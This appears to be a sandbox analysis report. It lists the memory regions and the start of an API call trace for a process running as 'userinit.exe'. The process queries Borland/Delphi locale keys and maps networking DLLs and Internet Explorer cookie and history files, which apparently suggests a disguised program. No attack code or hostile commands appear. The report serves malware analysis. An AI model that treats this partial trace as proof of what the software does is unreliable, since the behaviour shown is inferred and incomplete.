id = 4588
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4589
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4590
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 4591
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 4592
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4593
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 4594
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 4595
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 4596
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 4597
start_va = 0x190000
end_va = 0x257fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 4598
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4599
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4600
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 4601
start_va = 0xc0000
end_va = 0xc0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 4602
start_va = 0xf0000
end_va = 0xfffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 4603
start_va = 0x470000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 4604
start_va = 0x710000
end_va = 0x130ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000710000"
filename = ""
Region:
id = 4605
start_va = 0x1310000
end_va = 0x140ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001310000"
filename = ""
Region:
id = 4606
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 4607
start_va = 0x1410000
end_va = 0x15effff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 4608
start_va = 0x260000
end_va = 0x33efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000260000"
filename = ""
Region:
id = 4609
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 4610
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 4611
start_va = 0x1410000
end_va = 0x14dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 4612
start_va = 0x15b0000
end_va = 0x15effff
entry_point = 0x0
region_type = private
name = "private_0x00000000015b0000"
filename = ""
Region:
id = 4613
start_va = 0x15f0000
end_va = 0x1f1ffff
entry_point = 0x15f0000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 4614
start_va = 0xe0000
end_va = 0xe6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 4615
start_va = 0x100000
end_va = 0x101fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 4616
start_va = 0x1f20000
end_va = 0x2312fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001f20000"
filename = ""
Region:
id = 4617
start_va = 0x360000
end_va = 0x3dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000360000"
filename = ""
Region:
id = 4618
start_va = 0x2320000
end_va = 0x242cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002320000"
filename = ""
Region:
id = 4619
start_va = 0x2430000
end_va = 0x252ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002430000"
filename = ""
Region:
id = 4620
start_va = 0x2530000
end_va = 0x272ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002530000"
filename = ""
Region:
id = 4621
start_va = 0x580000
end_va = 0x600fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 4622
start_va = 0x1410000
end_va = 0x1492fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 4623
start_va = 0x14a0000
end_va = 0x14dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000014a0000"
filename = ""
Region:
id = 4624
start_va = 0x580000
end_va = 0x604fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 4625
start_va = 0x1410000
end_va = 0x1496fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 4626
start_va = 0x580000
end_va = 0x608fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 4627
start_va = 0x1410000
end_va = 0x149afff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 4628
start_va = 0x580000
end_va = 0x60cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 4629
start_va = 0x1410000
end_va = 0x149efff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 4630
start_va = 0x14e0000
end_va = 0x1570fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 4631
start_va = 0x2730000
end_va = 0x27c2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4632
start_va = 0x14e0000
end_va = 0x1574fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 4633
start_va = 0x2730000
end_va = 0x27c6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4634
start_va = 0x14e0000
end_va = 0x1578fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 4635
start_va = 0x2730000
end_va = 0x27cafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4636
start_va = 0x14e0000
end_va = 0x157cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 4637
start_va = 0x2730000
end_va = 0x27cefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4638
start_va = 0x14e0000
end_va = 0x1580fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 4639
start_va = 0x2730000
end_va = 0x27d2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4640
start_va = 0x14e0000
end_va = 0x1584fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 4641
start_va = 0x2730000
end_va = 0x27d6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4642
start_va = 0x14e0000
end_va = 0x1588fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 4643
start_va = 0x2730000
end_va = 0x27dafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4644
start_va = 0x14e0000
end_va = 0x158cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 4645
start_va = 0x2730000
end_va = 0x27defff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4646
start_va = 0x14e0000
end_va = 0x1590fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 4647
start_va = 0x2730000
end_va = 0x27e2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4648
start_va = 0x14e0000
end_va = 0x1594fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 4649
start_va = 0x2730000
end_va = 0x27e6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4650
start_va = 0x14e0000
end_va = 0x1598fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 4651
start_va = 0x2730000
end_va = 0x27eafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4652
start_va = 0x14e0000
end_va = 0x159cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 4653
start_va = 0x2730000
end_va = 0x27eefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4654
start_va = 0x14e0000
end_va = 0x15a0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 4655
start_va = 0x2730000
end_va = 0x27f2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4656
start_va = 0x14e0000
end_va = 0x15a4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 4657
start_va = 0x2730000
end_va = 0x27f6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4658
start_va = 0x14e0000
end_va = 0x15a8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 4659
start_va = 0x2730000
end_va = 0x27fafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4660
start_va = 0x14e0000
end_va = 0x15acfff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 4661
start_va = 0x2730000
end_va = 0x27fefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4662
start_va = 0x2800000
end_va = 0x28d0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 4663
start_va = 0x28e0000
end_va = 0x29b2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028e0000"
filename = ""
Region:
id = 4664
start_va = 0x2730000
end_va = 0x2804fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4665
start_va = 0x2810000
end_va = 0x28e6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 4666
start_va = 0x2730000
end_va = 0x2808fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4667
start_va = 0x2810000
end_va = 0x28eafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 4668
start_va = 0x2730000
end_va = 0x280cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4669
start_va = 0x2810000
end_va = 0x28eefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 4670
start_va = 0x28f0000
end_va = 0x29d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028f0000"
filename = ""
Region:
id = 4671
start_va = 0x2730000
end_va = 0x2812fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4672
start_va = 0x2820000
end_va = 0x2904fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 4673
start_va = 0x2730000
end_va = 0x2816fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4674
start_va = 0x2820000
end_va = 0x2908fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 4675
start_va = 0x2730000
end_va = 0x281afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4676
start_va = 0x2820000
end_va = 0x290cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 4677
start_va = 0x2730000
end_va = 0x281efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4678
start_va = 0x2820000
end_va = 0x2910fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 4679
start_va = 0x2920000
end_va = 0x2a12fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002920000"
filename = ""
Region:
id = 4680
start_va = 0x2730000
end_va = 0x2824fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4681
start_va = 0x2830000
end_va = 0x2926fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 4682
start_va = 0x2730000
end_va = 0x2828fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4683
start_va = 0x2830000
end_va = 0x292afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 4684
start_va = 0x2730000
end_va = 0x282cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4685
start_va = 0x2830000
end_va = 0x292efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 4686
start_va = 0x2930000
end_va = 0x2a30fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002930000"
filename = ""
Region:
id = 4687
start_va = 0x2730000
end_va = 0x2832fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4688
start_va = 0x2840000
end_va = 0x2944fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 4689
start_va = 0x2730000
end_va = 0x2836fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4690
start_va = 0x2840000
end_va = 0x2948fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 4691
start_va = 0x2730000
end_va = 0x283afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4692
start_va = 0x2840000
end_va = 0x294cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 4693
start_va = 0x2730000
end_va = 0x283ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 4694
start_va = 0x2950000
end_va = 0x2a62fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002950000"
filename = ""
Region:
id = 4695
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 4696
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 4697
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 4698
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 4699
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 4700
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 4701
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 4702
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x110000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 4703
start_va = 0x2a70000
end_va = 0x2b6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a70000"
filename = ""
Region:
id = 4704
start_va = 0x120000
end_va = 0x120fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000120000"
filename = ""
Region:
id = 4705
start_va = 0x6d820000
end_va = 0x6d838fff
entry_point = 0x6d820000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 4706
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 4707
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 4708
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 4709
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 4710
start_va = 0x1430000
end_va = 0x146ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001430000"
filename = ""
Region:
id = 4711
start_va = 0x2bf0000
end_va = 0x2ceffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002bf0000"
filename = ""
Region:
id = 4712
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 4713
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 4714
start_va = 0x2cf0000
end_va = 0x2fbefff
entry_point = 0x2cf0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4715
start_va = 0x130000
end_va = 0x131fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 4716
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 4717
start_va = 0x140000
end_va = 0x140fff
entry_point = 0x140000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 4718
start_va = 0x340000
end_va = 0x341fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000340000"
filename = ""
Region:
id = 4719
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 4720
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 4721
start_va = 0x140000
end_va = 0x140fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 4722
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 4723
start_va = 0x580000
end_va = 0x5abfff
entry_point = 0x580000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 4724
start_va = 0x3e0000
end_va = 0x3e7fff
entry_point = 0x3e0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 4725
start_va = 0x5b0000
end_va = 0x5bffff
entry_point = 0x5b0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 4726
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 4727
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 4728
start_va = 0x14e0000
end_va = 0x153ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 4729
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 4730
start_va = 0x2fc0000
end_va = 0x30effff
entry_point = 0x0
region_type = private
name = "private_0x0000000002fc0000"
filename = ""
Region:
id = 4731
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 4732
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 4733
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 4734
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 4735
start_va = 0x2fc0000
end_va = 0x307ffff
entry_point = 0x2fc0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 4736
start_va = 0x30b0000
end_va = 0x30effff
entry_point = 0x0
region_type = private
name = "private_0x00000000030b0000"
filename = ""
Thread:
id = 271
os_tid = 0x524
[0147.863] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0147.863] GetKeyboardType (nTypeFlag=0) returned 4
[0147.863] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0147.863] GetStartupInfoA (in: lpStartupInfo=0x18fc14 | out: lpStartupInfo=0x18fc14*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0147.863] GetVersion () returned 0x1db10106
[0147.863] GetVersion () returned 0x1db10106
[0147.864] GetCurrentThreadId () returned 0x524
[0147.864] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f710, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0147.864] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f5eb, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0147.864] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f700 | out: phkResult=0x18f700*=0x0) returned 0x2
[0147.864] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f700 | out: phkResult=0x18f700*=0x0) returned 0x2
[0147.864] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f700 | out: phkResult=0x18f700*=0x0) returned 0x2
[0147.864] lstrcpynA (in: lpString1=0x18f5eb, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0147.864] GetThreadLocale () returned 0x409
[0147.864] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f6fb, cchData=5 | out: lpLCData="ENU") returned 4
[0147.865] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0147.865] lstrcpynA (in: lpString1=0x18f608, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0147.865] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0147.865] lstrcpynA (in: lpString1=0x18f608, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0147.865] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0147.865] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0147.866] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x623640
[0147.866] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1310000
[0147.866] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x624640
[0147.866] VirtualAlloc (lpAddress=0x1310000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1310000
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
